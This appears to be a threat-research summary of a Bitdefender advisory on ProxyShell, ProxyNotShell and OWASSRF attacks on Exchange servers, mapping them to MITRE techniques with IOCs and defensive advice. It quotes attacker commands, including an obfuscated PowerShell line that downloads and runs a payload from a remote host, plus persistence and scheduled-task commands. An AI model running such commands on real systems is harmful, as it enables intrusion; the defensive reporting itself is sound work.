Threat Research

Technical Advisory: Proxy*Hell Exploit Chains in the Wild 

Securonix

Bitdefender researchers document ProxyNotShell/OWASSRF exploit chains targeting on-prem Microsoft Exchange, outlining how SSRF can lead to backend access and how multiple exploit chains culminate in RCE and payload deployment. The report also walks through real-world campaigns, including ProxyShell, IABs deploying web shells, Cuba ransomware activity, and the GoBackClient backdoor, with indicators and defensive recommendations.
#ProxyShell #ProxyNotShell #OWASSRF #GoToAssist #Meterpreter #CubaRansomware #Bughatch #OrangeTsai #DEVCORE #CrowdStrike

Keypoints

  • ProxyNotShell/OWASSRF/ProxyShell chains target on-prem Exchange via SSRF to reach backend services and potentially execute code.
  • Exchange architecture (CAS and backend services) creates an attack surface where SSRF can bypass some protections and enable RCE.
  • Attack chains combine SSRF with privilege escalation, code stashing in mailboxes, and PowerShell-based deployment to deliver web shells and backdoors.
  • Post-exploitation activity includes persistence (service- or user-based), lateral movement (remote services, file copies), and credential access attempts.
  • Real-world cases show IAB activity with web shells, GoToAssist deployments, Cuba ransomware integrations, and GoBackClient backdoor with feature-rich commands.
  • Defensive guidance emphasizes defense-in-depth, patching, IP/URL reputation, and robust detection/response to stop reconnaissance and exploitation.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – SSRF exploited to access backend Exchange services and enable remote code execution. Quote: “…SSRF attack… is a type of attack that allows an attacker to send a crafted request from a vulnerable server to a different server…”
  • [T1059.001] PowerShell – Use of PowerShell for download, execution, and in-memory operations (including encoded commands). Quote: “powershell -nop -c $ds = ‘D’ + ‘Own’ + ‘LOa’ + ‘DfI’ + ‘le’; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke(‘https://autodiscover…/6.css’, ‘c:windowstempc.msi’)”
  • [T1021] Remote Services – Lateral movement via remote control tools (ConnectWise Control, GoToAssist). Quote: “The next action was to move laterally by using GoToAssist.”
  • [T1543.003] Create or Modify System Process: Windows Service – Persistence via service-like execution (e.g., svchosts.exe -service). Quote: “c:programdatasvchosts.exe -service -beacon …”
  • [T1505.003] Web Shell – Deploying web shells on Exchange to maintain access. Quote: “A web shell is a malicious program… uploaded to a web server to gain unauthorized access…”
  • [T1197] BITS Jobs – Use of Background Intelligent Transfer Service to download additional payloads. Quote: “Start-BitsTransfer -Source …”
  • [T1059.001] PowerShell (Obfuscated/Encoded) – Encoded commands and base64 payloads to evade detection. Quote: “Echo chain is also used to generate a VBScript file in location … After this VBscript file is executed, it will read the content of the base64 file …”
  • [T1112] Modify Registry – Enabling RDP by modifying HKLMSystemCurrentControlSetControlTerminal ServerfDenyTSConnections to 0. Quote: “enables the RDP by setting the registry value … to 0”
  • [T1053] Scheduled Task – Use of schtasks to create tasks for persistence. Quote: “schtasks /create /sc onstart /TN …”
  • [T1003] Credential Dumping – Dumping credentials from SAM and LSASS to facilitate further access. Quote: “dumping credentials from the SAM database and LSASS memory…”
  • [T1483] Domain Generation Algorithms – Use of DGA to generate C2 domains when the server is unavailable. Quote: “This backdoor uses a domain generation algorithm (DGA) when the server from the configuration file is unavailable.”

Indicators of Compromise

  • [IP] – 64.190.113.48 and 162.243.150.6 — used to launch attacks and host payloads
  • [IP] – 66.42.116.130:443 and 91.206.178.76:443 — Relay servers used by ConnectWise Control
  • [IP] – 45.77.91.209:443 and 149.28.249.156:443 — Additional relay servers for C2
  • [IP] – 38.135.122.130 and 38.108.119.121 — Hosted payloads and stage servers; multiple binaries downloaded
  • [Domain] – lostbussiness[.]com and devoterfo[.]com — hosting the same binaries (Bughatch/Komar)
  • [MD5] – 53c2f5ebde7c5417b2b4081070643da1; 43250dd7f3a01c689131849c39f36482 — MD5s of downloaded components
  • [URL] – https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/mb.css; https://mail.fcp***.us/owa/auth/Current/themes/resources/ls.css — downloaded payloads
  • [URL] – https://devoterfo[.]com:443/komar66.dll; https://devoterfo[.]com:443/komar65.dll; https://devoterfo[.]com:443/addp.dll — various stage/download URLs
  • [File] – FrontEndHttpProxyecpauthLogout.aspx; inetpubwwwrootaspnet_clientsystem_webiisstart.aspx — created web shells
  • [File] – GoToAssist Unattended.exe — GoToAssist-related payloads
  • [Process] – svchosts.exe -service -beacon — used as a persistence/service process

Read more: https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint